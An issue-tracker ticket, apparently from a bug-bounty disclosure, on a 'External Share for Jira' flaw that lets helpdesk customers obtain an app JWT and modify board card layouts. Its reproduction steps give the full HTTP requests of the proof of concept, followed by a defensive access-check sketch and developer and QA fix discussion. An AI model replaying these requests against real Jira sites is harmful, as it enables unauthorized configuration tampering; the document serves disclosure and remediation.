Unauthorized Modification of Board Card Settings
Description
Summary
It has been discovered that a "customer" user, self-registered on a Jira helpdesk portal, can modify the settings and layout of board cards in Jira.
Details
Initially, a service project was created in Jira. I then registered a "customer" account on that project's portal, as shown below:
The following image demonstrates the request made to obtain the context URL for the application, using the "customer" user's cookies:
Subsequently, I submitted a request using the obtained URL in the url parameter to obtain a valid JWT for interacting with the application:
Next, it was possible to modify the Jira board card layout using the obtained JWT:
- Request sent to list board cards in Jira
- Request sent to modify the board card settings
Impact
This vulnerability compromises the integrity of the board card configurations used in external shares. An external attacker, merely registered as a "customer" on the helpdesk portal, can alter these configurations and disrupt the external shares of businesses without even having direct access to the victim's Jira.
Steps to Reproduce
- Log in as an administrator in Jira and install the “External Share for Jira” app.
- Navigate to apps > external share > board card settings.
- Create a new configuration and save it.
- Then, create a Service project in Jira.
- Access the created service project and copy the project portal URL from the "channels" menu.
As Attacker:
- Access the portal URL in another browser and register as a customer.
- In your browser’s developer tools, copy the cookie `customer.account.session.token`.
- Replace `{your-domain}` in the following request with your Jira hostname and `{customer-cookie}` with the copied value (customer cookie):

POST /plugins/servlet/ac/ovh.atlasinc.jira.jira-share/create-board?classifier=json HTTP/2
Host: {your-domain}.atlassian.net
Cookie: customer.account.session.token={customer-cookie}
Content-Length: 0
- Copy the URL from the url parameter.
- Submit the following request after replacing `{url}` with the copied URL to get a JWT for the user:

POST /api/atlassian-connect-app HTTP/1.1
Host: jira.external-share.com
Content-Type: application/json
Content-Length: 738
Origin: https://jira.external-share.com

{"url":"{url}"}
- Copy the JWT returned by the application.
- Submit the following requests after replacing `{customer-jwt}` with the obtained JWT:

* List created board card layouts

GET /api/board-card-layout/list HTTP/1.1
Host: jira.external-share.com
Authorization: JWT {customer-jwt}

* Modify a board card layout
> Copy the ID of a layout from the response of the previous request.
> Replace `{layout-id}` with the copied ID.

PUT /api/board-card-layout HTTP/1.1
Host: jira.external-share.com
Content-Type: application/json
Content-Length: 1286
Authorization: JWT {customer-jwt}

{"name":"bugcrowd-poc","id":{layout-id},"cardLayout":[{"cells":[{"type":"cell","value":{"value1":{"id":"summary","text":"Summary","selected":true,"disabled":false},"value2":{"id":"","text":"","selected":true,"disabled":false},"value3":{"id":"","text":"","selected":true,"disabled":false}}}],"justifyContent":"SPACEBETWEEN","type":"row","index":0},{"cells":[{"type":"cell","value":{"value1":{"id":"labels","text":"Labels","selected":true,"disabled":false},"value2":{"id":"parent","text":"Parent","selected":true,"disabled":false},"value3":{"id":"","text":"","selected":true,"disabled":false}}}],"justifyContent":"SPACEBETWEEN","type":"row","index":1},{"cells":[{"type":"cell","value":{"value1":{"id":"issuetype","text":"Issue Type","selected":true,"disabled":false},"value2":{"id":"issueKey","text":"Issue Key","selected":true,"disabled":false},"value3":{"id":"","text":"","selected":true,"disabled":false}}},{"type":"cell","value":{"value1":{"id":"subtasks","text":"Sub-tasks","selected":true,"disabled":false},"value2":{"id":"priority","text":"Priority","selected":true,"disabled":false},"value3":{"id":"assignee","text":"Assignee","selected":true,"disabled":false}}}],"justifyContent":"SPACEBETWEEN","type":"row","index":2}],"cardColor":{"type":"None","value":{"darkMode":{},"lightMode":{}}}}
- Observe that it was possible to perform these operations, despite being authenticated as a "customer" user without access to Jira.
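As an added, defender-side illustration (not the External Share app's own code), the two enforcement points the fix discussion in this ticket converges on: the token exchange refuses JSM portal customers outright, and the board-card-layout endpoints require a licensed user for the list and an admin for writes. The HS256 key, the claim names (`sub`, `role`, `exp`) and the role names are assumptions; the app's real JWT format is not on this page.

```python
import base64, hashlib, hmac, json, time
from typing import Optional

# Constructed demo key; the app's real signing material and claim layout are not on the page.
SECRET = b"constructed-demo-key"

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def unb64url(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def issue_token(account: dict) -> Optional[str]:
    """Stand-in for the /api/atlassian-connect-app exchange: a JSM portal customer
    (assumed account type "customer") never receives a JWT for the app's API."""
    if account.get("type") == "customer":
        return None
    claims = {"sub": account["id"], "role": account["type"], "exp": int(time.time()) + 600}
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url(json.dumps(claims).encode())
    sig = hmac.new(SECRET, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"

def verify_token(token: str) -> Optional[dict]:
    """Return the claims only if the HS256 signature and the expiry are valid."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header, body, sig = parts
    expected = hmac.new(SECRET, f"{header}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, unb64url(sig)):
        return None
    claims = json.loads(unb64url(body))
    return claims if claims.get("exp", 0) > time.time() else None

# Roles allowed per endpoint (assumed names): licensed users may read the list,
# only admins may create, update or delete a layout, matching the global-settings access model.
POLICY = {
    ("GET", "/api/board-card-layout/list"): {"user", "admin"},
    ("PUT", "/api/board-card-layout"): {"admin"},
    ("DELETE", "/api/board-card-layout"): {"admin"},
}

def authorize(method: str, path: str, auth_header: Optional[str]) -> int:
    """HTTP status the endpoint should answer: 200 allowed, 401 missing/invalid token, 403 wrong role."""
    if not auth_header or not auth_header.startswith("JWT "):
        return 401
    claims = verify_token(auth_header[len("JWT "):])
    if claims is None:
        return 401
    allowed = POLICY.get((method, path), set())  # unknown endpoint: deny by default
    return 200 if claims.get("role") in allowed else 403
```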
Fix verified - QA env
Customer is not able to add, edit or delete card board issue layout
@Polina Naumenko Please retest, the list should be accessible now, but adding, updating or deleting requires admin permission so I guess it’s okay. Same as Issue layout
@Krzysztof Bogdan Well, I’m left with this, and no more ideas… I think the current solution will be enough for now. I’m transferring this JWT problem to a new independent issue 🙂
@Igor Hercer I think all views need to be secured to prevent JWT negotiation for JSM customer.
@Krzysztof Bogdan Ok, I’ll do it this way, but I think that adding, updating should be only for admin since he’s the only one that can actually access global settings, and the list should be secured with your solution. Maybe we should also secure the list for issue layouts because it has 0 security either.
@Igor Hercer We want regular users to view this list.
I think we should secure all views with:
I think that should solve the problem and a Jira customer user will not be capable of generating a JWT, but we need to test this.
Hello @Igor Hercer,
Please merge code to dev branch.
This is the best moment to add more information that can be helpful to prepare release notes.
Can you prepare a short overview of the change that can be used in release notes?
Please provide a short GIF that showcases the feature.
If a GIF makes no sense, can you provide an image that highlights the feature, which can be used in release notes (cropped & annotated)?
Fix verified - QA env
@Polina Naumenko Please retest:)
@Krzysztof Bogdan Just wanted to ask: since only admins have access to global settings, I’m gonna restrict this also.
@Igor Hercer Should you? Who should have access to this list?
@Krzysztof Bogdan Is it okay, or should I restrict the list also?
Customer is unable to modify layout
However, a customer is still able to get the list of board card settings.
@Krzysztof Bogdan @Polina Naumenko Is it ready for deploy to dev?
@Polina Naumenko Yea this works
https://tracker.bugcrowd.com/warsawdynamics/submissions/edb4bc43-8372-4cc1-8bc1-2b09e1a0a27a?duplicate[]=false&sort[]=submitted-desc&substate[]=resolved
@Krzysztof Bogdan how about this one?
Hello @Igor Hercer
This is the best moment to add more information that can be helpful for the tester.
What areas are affected?
What are potential edge cases?
Was it checked for XSS problems?
Does change affect security, is new data exposed?
Please attach - Before / After screenshot if possible.
@Polina Naumenko I have no access to:
https://tracker.bugcrowd.com/tasks/bb0f0424-a67e-478b-9f47-a06273335a1d
Can you link submission?
Hello @Igor Hercer,
Change was reviewed and approved.
Task is ready to be deployed to QA.
Once it is deployed to QA please move ticket to "To Test"
Thank you!
Hello [~accountid:],
Task is ready for review.
@Igor Hercer Please make sure the reviewer has easy access to the content to be reviewed.
If this is a code change, please make sure a PR is created.
If this is new documentation, a blog post, etc., please provide a link to the page.
@Krzysztof Bogdan sure
@Igor Hercer Please take a look